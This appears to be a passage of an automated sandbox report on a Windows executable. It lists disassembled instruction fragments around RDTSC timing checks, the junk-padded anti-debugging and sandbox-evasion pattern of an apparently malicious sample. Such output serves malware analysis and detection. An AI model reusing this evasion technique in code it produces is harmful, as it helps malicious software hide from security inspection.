Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A03BB second address: 72A03FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007FC728ECBE0Dh 0x0000000c sbb cx, 0F76h 0x00000011 jmp 00007FC728ECBE11h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr fs:[00000030h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC728ECBE0Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A04C4 second address: 72A04C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A04C9 second address: 72A0521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007FC728ECBE10h 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 jmp 00007FC728ECBE10h 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC728ECBE17h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0521 second address: 72A0528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0528 second address: 72A0545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+4Ch] 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d mov eax, ebx 0x0000000f popad 0x00000010 mov dword ptr [esi+10h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 mov si, 6C3Fh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0545 second address: 72A054B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A054B second address: 72A054F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A054F second address: 72A055D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A055D second address: 72A0594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx esi, di 0x0000000c popad 0x0000000d mov dword ptr [esi+14h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC728ECBE18h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0594 second address: 72A05A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7292A9B0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A05A6 second address: 72A05AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A05AA second address: 72A05D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FC7292A9B18h 0x00000013 mov ax, F6E1h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A05D5 second address: 72A05F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 53522860h 0x00000008 mov cx, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+18h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC728ECBE0Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A05F6 second address: 72A05FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A05FC second address: 72A0657 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+58h] 0x0000000e jmp 00007FC728ECBE0Eh 0x00000013 mov dword ptr [esi+1Ch], eax 0x00000016 jmp 00007FC728ECBE10h 0x0000001b mov eax, dword ptr [ebx+5Ch] 0x0000001e jmp 00007FC728ECBE10h 0x00000023 mov dword ptr [esi+20h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC728ECBE0Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0657 second address: 72A065D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A065D second address: 72A0663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0663 second address: 72A0667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0667 second address: 72A06F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+60h] 0x0000000e jmp 00007FC728ECBE10h 0x00000013 mov dword ptr [esi+24h], eax 0x00000016 jmp 00007FC728ECBE10h 0x0000001b mov eax, dword ptr [ebx+64h] 0x0000001e pushad 0x0000001f mov ax, 96EDh 0x00000023 jmp 00007FC728ECBE0Ah 0x00000028 popad 0x00000029 mov dword ptr [esi+28h], eax 0x0000002c jmp 00007FC728ECBE10h 0x00000031 mov eax, dword ptr [ebx+68h] 0x00000034 jmp 00007FC728ECBE10h 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FC728ECBE0Ah 0x00000045 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A06F5 second address: 72A06FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A06FB second address: 72A0756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC728ECBE0Ch 0x00000009 adc esi, 008FEB48h 0x0000000f jmp 00007FC728ECBE0Bh 0x00000014 popfd 0x00000015 mov esi, 1497C2BFh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ax, word ptr [ebx+6Ch] 0x00000021 jmp 00007FC728ECBE12h 0x00000026 mov word ptr [esi+30h], ax 0x0000002a pushad 0x0000002b mov di, cx 0x0000002e mov edx, esi 0x00000030 popad 0x00000031 mov ax, word ptr [ebx+00000088h] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b movsx edi, si 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0756 second address: 72A07D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7292A9B0Fh 0x00000009 adc ax, 8B9Eh 0x0000000e jmp 00007FC7292A9B19h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC7292A9B10h 0x0000001a sub ch, FFFFFF98h 0x0000001d jmp 00007FC7292A9B0Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov word ptr [esi+32h], ax 0x0000002a jmp 00007FC7292A9B16h 0x0000002f mov eax, dword ptr [ebx+0000008Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov cx, dx 0x0000003b mov dh, 83h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A07D4 second address: 72A0817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c jmp 00007FC728ECBE16h 0x00000011 mov eax, dword ptr [ebx+18h] 0x00000014 pushad 0x00000015 mov cl, DCh 0x00000017 call 00007FC728ECBE13h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0817 second address: 72A08DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esi+38h], eax 0x00000009 pushad 0x0000000a mov al, dl 0x0000000c pushfd 0x0000000d jmp 00007FC7292A9B0Ch 0x00000012 xor esi, 1003DF18h 0x00000018 jmp 00007FC7292A9B0Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+1Ch] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC7292A9B14h 0x00000029 xor cl, 00000078h 0x0000002c jmp 00007FC7292A9B0Bh 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007FC7292A9B18h 0x00000038 and si, 63D8h 0x0000003d jmp 00007FC7292A9B0Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov dword ptr [esi+3Ch], eax 0x00000047 pushad 0x00000048 mov si, 60ABh 0x0000004c pushfd 0x0000004d jmp 00007FC7292A9B10h 0x00000052 or ax, AE38h 0x00000057 jmp 00007FC7292A9B0Bh 0x0000005c popfd 0x0000005d popad 0x0000005e mov eax, dword ptr [ebx+20h] 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FC7292A9B15h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A08DB second address: 72A08EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0A49 second address: 72A0AD9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC7292A9B10h 0x00000008 sbb esi, 6DAB4058h 0x0000000e jmp 00007FC7292A9B0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FC7292A9B18h 0x0000001c xor si, CAB8h 0x00000021 jmp 00007FC7292A9B0Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov edi, eax 0x0000002a pushad 0x0000002b mov bl, al 0x0000002d movsx edx, ax 0x00000030 popad 0x00000031 test edi, edi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FC7292A9B15h 0x0000003c sbb cx, 0806h 0x00000041 jmp 00007FC7292A9B11h 0x00000046 popfd 0x00000047 push eax 0x00000048 pop ebx 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0AD9 second address: 72A0AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC797E6A9DFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC728ECBE0Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0AFF second address: 72A0B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7292A9B0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0B26 second address: 72A0B4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC728ECBE0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0B4D second address: 72A0B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7292A9B0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0B5D second address: 72A0B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, 3671E436h 0x00000016 mov cx, bx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0B7D second address: 72A0C1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007FC7292A9B10h 0x00000010 nop 0x00000011 pushad 0x00000012 mov ecx, 18A0315Dh 0x00000017 push esi 0x00000018 pushfd 0x00000019 jmp 00007FC7292A9B19h 0x0000001e sbb cx, C9A6h 0x00000023 jmp 00007FC7292A9B11h 0x00000028 popfd 0x00000029 pop eax 0x0000002a popad 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 pushfd 0x00000032 jmp 00007FC7292A9B19h 0x00000037 and ax, 49B6h 0x0000003c jmp 00007FC7292A9B11h 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0C1E second address: 72A0C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b jmp 00007FC728ECBE0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 mov si, 6987h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0D27 second address: 72A0D6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 75h 0x00000005 mov bx, 1B90h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FC79824848Ch 0x00000012 pushad 0x00000013 call 00007FC7292A9B15h 0x00000018 mov di, ax 0x0000001b pop ecx 0x0000001c call 00007FC7292A9B0Dh 0x00000021 movzx ecx, di 0x00000024 pop ebx 0x00000025 popad 0x00000026 mov eax, dword ptr [ebp-04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0D6E second address: 72A0D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0D72 second address: 72A0D78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0D78 second address: 72A0D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE13h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0D8F second address: 72A0DB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC7292A9B17h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DB5 second address: 72A0DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DB9 second address: 72A0DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DBF second address: 72A0DCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DCE second address: 72A0DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+70h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7292A9B10h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DEB second address: 72A0DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0DF1 second address: 72A0E01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0E01 second address: 72A0E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72A0E05 second address: 72A0E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72807F3 second address: 72807F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72807F9 second address: 7280808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7280808 second address: 728080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 728080C second address: 728084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC728ECBE10h 0x00000010 sbb ax, 6C68h 0x00000015 jmp 00007FC728ECBE0Bh 0x0000001a popfd 0x0000001b movzx ecx, di 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC728ECBE0Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 728084F second address: 7280855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7280855 second address: 7280859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7290A63 second address: 7290A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7290A67 second address: 7290A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7290A6D second address: 7290B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov ax, bx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC7292A9B13h 0x00000012 sbb cx, D8FEh 0x00000017 jmp 00007FC7292A9B19h 0x0000001c popfd 0x0000001d mov ecx, 4F8B4147h 0x00000022 popad 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC7292A9B18h 0x0000002d sbb ax, FF28h 0x00000032 jmp 00007FC7292A9B0Bh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007FC7292A9B18h 0x0000003e adc ax, 3188h 0x00000043 jmp 00007FC7292A9B0Bh 0x00000048 popfd 0x00000049 popad 0x0000004a push dword ptr [ebp+04h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FC7292A9B15h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300AB6 second address: 7300ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300ABA second address: 7300AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300AD7 second address: 7300ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300ADC second address: 7300B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC7292A9B0Dh 0x0000000a adc si, 7756h 0x0000000f jmp 00007FC7292A9B11h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007FC7292A9B11h 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FC7292A9B0Eh 0x00000024 mov ebp, esp 0x00000026 jmp 00007FC7292A9B10h 0x0000002b mov dl, byte ptr [ebp+14h] 0x0000002e pushad 0x0000002f jmp 00007FC7292A9B0Eh 0x00000034 movzx eax, bx 0x00000037 popad 0x00000038 mov eax, dword ptr [ebp+10h] 0x0000003b pushad 0x0000003c mov ebx, 7320669Eh 0x00000041 push eax 0x00000042 push edx 0x00000043 mov ebx, 294A9E38h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300B61 second address: 7300BA4 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 5E2765E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a and dl, 00000007h 0x0000000d jmp 00007FC728ECBE13h 0x00000012 test eax, eax 0x00000014 jmp 00007FC728ECBE16h 0x00000019 je 00007FC798F4145Fh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BA4 second address: 7300BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BAA second address: 7300BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BAF second address: 7300BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ah, 99h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BD1 second address: 7300BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BD7 second address: 7300BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BDB second address: 7300BFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ecx 0x0000000c pushad 0x0000000d mov ax, D35Dh 0x00000011 popad 0x00000012 shr eax, 1 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov cl, bh 0x00000019 mov ebx, ecx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BFC second address: 7300C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7292A9B12h 0x00000009 rdtsc
